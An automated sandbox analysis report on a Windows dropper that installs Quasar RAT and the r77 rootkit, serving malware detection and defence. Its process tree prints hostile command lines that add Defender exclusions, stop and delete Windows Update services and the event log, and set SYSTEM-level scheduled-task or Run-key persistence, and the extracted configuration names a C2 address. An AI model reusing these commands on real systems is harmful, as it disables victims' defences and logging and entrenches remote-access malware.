Edit tour

Windows Analysis Report
5fr5gthkjdg71.exe

Overview

General Information

Sample name:	5fr5gthkjdg71.exe
Analysis ID:	1583267
MD5:	13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1:	762c7072179bce1822999dc30c6252262caf6c00
SHA256:	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
Tags:	exequasarQuasarRATuser-juroots
Infos:

Detection

Quasar, R77 RootKit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

Sigma detected: Stop multiple services

Yara detected Quasar RAT

Yara detected R77 RootKit

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Protects its processes via BreakOnTermination flag

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Uses Register-ScheduledTask to add task schedules

Uses cmd line tools excessively to alter registry or file data

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

5fr5gthkjdg71.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\5fr5gthkjdg71.exe" MD5: 13B0DEC8A2C9291EC13CA9D0F1A98B33)

gfiKDLgr58thy4d.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" MD5: 952F360A4651F948BE3A673178631641)

powershell.exe (PID: 7564 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 916 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 8172 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3912 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7460 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7872 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7960 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powercfg.exe (PID: 7748 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7700 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7836 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7852 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer.exe (PID: 7680 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

kaptsegthwf.exe (PID: 7488 cmdline: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe MD5: 952F360A4651F948BE3A673178631641)

powershell.exe (PID: 7376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7744 cmdline: C:\Windows\system32\sc.exe delete "WAGDKRVZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5848 cmdline: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7372 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5676 cmdline: C:\Windows\system32\sc.exe start "WAGDKRVZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GR55Qg1hth.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\GR55Qg1hth.exe" MD5: 8E40252356A6FB3F8F52D1EFFA2C2C3C)

powershell.exe (PID: 7588 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8124 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1396 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7500 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7868 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4040 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7972 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

reg.exe (PID: 7672 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7216 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7244 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7248 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 3624 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8132 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2500 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7480 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7520 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7876 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 8156 cmdline: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

F4R5fd8grr.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\F4R5fd8grr.exe" MD5: EA001F076677C9B0DD774AE670EFDF63)

schtasks.exe (PID: 7864 cmdline: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Client.exe (PID: 7916 cmdline: "C:\Users\user\AppData\Roaming\SubDir\Client.exe" MD5: EA001F076677C9B0DD774AE670EFDF63)

schtasks.exe (PID: 7960 cmdline: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

F4R5fd8grr.exe (PID: 7952 cmdline: C:\Users\user\Desktop\F4R5fd8grr.exe MD5: EA001F076677C9B0DD774AE670EFDF63)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Name	Description	Attribution	Blogpost URLs	Link
r77, r77 Rootkit	According to the author, r77 is a ring 3 rootkit that hides everything: * Files, directories* Processes & CPU usage* Registry keys & values* Services* TCP & UDP connections* Junctions, named pipes, scheduled tasks	No Attribution	https://github.com/bytecode77/r77-rootkit https://twitter.com/malmoeb/status/1523179260273254407	https://malpedia.caad.fkie.fraunhofer.de/details/win.r77

Malware Configuration

Threatname: Quasar

{"Version": "1.4.0", "Host:Port": "185.148.3.216:4000;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c3557859-56ac-475e-b44d-e1b60c20d0d0", "Tag": "4Drun", "LogDirectoryName": "Logs"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
5fr5gthkjdg71.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5fr5gthkjdg71.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x5e7bf1:$x1: Quasar.Common.Messages 0x5eb2aa:$x1: Quasar.Common.Messages 0x5f7545:$x4: Uninstalling... good bye :-( 0x5f8c6a:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5fr5gthkjdg71.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x5f6ee9:$f1: FileZilla\recentservers.xml 0x5f6f29:$f2: FileZilla\sitemanager.xml 0x5f6f6b:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x5f70e9:$b1: Chrome\User Data\ 0x5f725f:$b2: Mozilla\Firefox\Profiles 0x5f735b:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x602854:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x5f73f7:$b4: Opera Software\Opera Stable\Login Data 0x5f7461:$b5: YandexBrowser\User Data\ 0x5f72af:$s4: logins.json 0x5f7155:$a1: username_value 0x5f7173:$a2: password_value 0x5f72ef:$a3: encryptedUsername 0x602798:$a3: encryptedUsername 0x5f7313:$a4: encryptedPassword 0x6027b6:$a4: encryptedPassword 0x602734:$a5: httpRealm
5fr5gthkjdg71.exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x5b938b:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x5b9436:$s2: DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null 0x5f762f:$s3: Process already elevated. 0x5e7abf:$s4: get_PotentiallyVulnerablePasswords 0x5e287c:$s5: GetKeyloggerLogsDirectory 0x5eb065:$s5: GetKeyloggerLogsDirectory 0x5e7ae2:$s6: set_PotentiallyVulnerablePasswords 0x603fa8:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\SubDir\Client.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\AppData\Roaming\SubDir\Client.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\SubDir\Client.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x5b594:$x1: Quasar.Common.Messages 0x5ec4d:$x1: Quasar.Common.Messages 0x6aee8:$x4: Uninstalling... good bye :-( 0x6c60d:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\AppData\Roaming\SubDir\Client.exe	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x5c0d1:$s2: set_SystemInfos 0x57ad9:$s4: set_RemotePath 0x7cc4c:$s6: Client.exe 0x7cd0c:$s6: Client.exe
C:\Users\user\AppData\Roaming\SubDir\Client.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x6a88c:$f1: FileZilla\recentservers.xml 0x6a8cc:$f2: FileZilla\sitemanager.xml 0x6a90e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x6aa8c:$b1: Chrome\User Data\ 0x6ac02:$b2: Mozilla\Firefox\Profiles 0x6acfe:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x761f7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x6ad9a:$b4: Opera Software\Opera Stable\Login Data 0x6ae04:$b5: YandexBrowser\User Data\ 0x6ac52:$s4: logins.json 0x6aaf8:$a1: username_value 0x6ab16:$a2: password_value 0x6ac92:$a3: encryptedUsername 0x7613b:$a3: encryptedUsername 0x6acb6:$a4: encryptedPassword 0x76159:$a4: encryptedPassword 0x760d7:$a5: httpRealm
C:\Users\user\AppData\Roaming\SubDir\Client.exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x2cd2e:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2cdd9:$s2: DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null 0x6afd2:$s3: Process already elevated. 0x5b462:$s4: get_PotentiallyVulnerablePasswords 0x5621f:$s5: GetKeyloggerLogsDirectory 0x5ea08:$s5: GetKeyloggerLogsDirectory 0x5b485:$s6: set_PotentiallyVulnerablePasswords 0x7794b:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
C:\Users\user\Desktop\F4R5fd8grr.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\Desktop\F4R5fd8grr.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Desktop\F4R5fd8grr.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x5b594:$x1: Quasar.Common.Messages 0x5ec4d:$x1: Quasar.Common.Messages 0x6aee8:$x4: Uninstalling... good bye :-( 0x6c60d:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\Desktop\F4R5fd8grr.exe	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x5c0d1:$s2: set_SystemInfos 0x57ad9:$s4: set_RemotePath 0x7cc4c:$s6: Client.exe 0x7cd0c:$s6: Client.exe
C:\Users\user\Desktop\F4R5fd8grr.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x6a88c:$f1: FileZilla\recentservers.xml 0x6a8cc:$f2: FileZilla\sitemanager.xml 0x6a90e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x6aa8c:$b1: Chrome\User Data\ 0x6ac02:$b2: Mozilla\Firefox\Profiles 0x6acfe:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x761f7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x6ad9a:$b4: Opera Software\Opera Stable\Login Data 0x6ae04:$b5: YandexBrowser\User Data\ 0x6ac52:$s4: logins.json 0x6aaf8:$a1: username_value 0x6ab16:$a2: password_value 0x6ac92:$a3: encryptedUsername 0x7613b:$a3: encryptedUsername 0x6acb6:$a4: encryptedPassword 0x76159:$a4: encryptedPassword 0x760d7:$a5: httpRealm
C:\Users\user\Desktop\F4R5fd8grr.exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x2cd2e:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2cdd9:$s2: DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null 0x6afd2:$s3: Process already elevated. 0x5b462:$s4: get_PotentiallyVulnerablePasswords 0x5621f:$s5: GetKeyloggerLogsDirectory 0x5ea08:$s5: GetKeyloggerLogsDirectory 0x5b485:$s6: set_PotentiallyVulnerablePasswords 0x7794b:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Process Memory Space: 5fr5gthkjdg71.exe PID: 7452	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: GR55Qg1hth.exe PID: 7540	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
Process Memory Space: F4R5fd8grr.exe PID: 7548	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: Client.exe PID: 7916	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
68.2.conhost.exe.1a646d10000.2.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
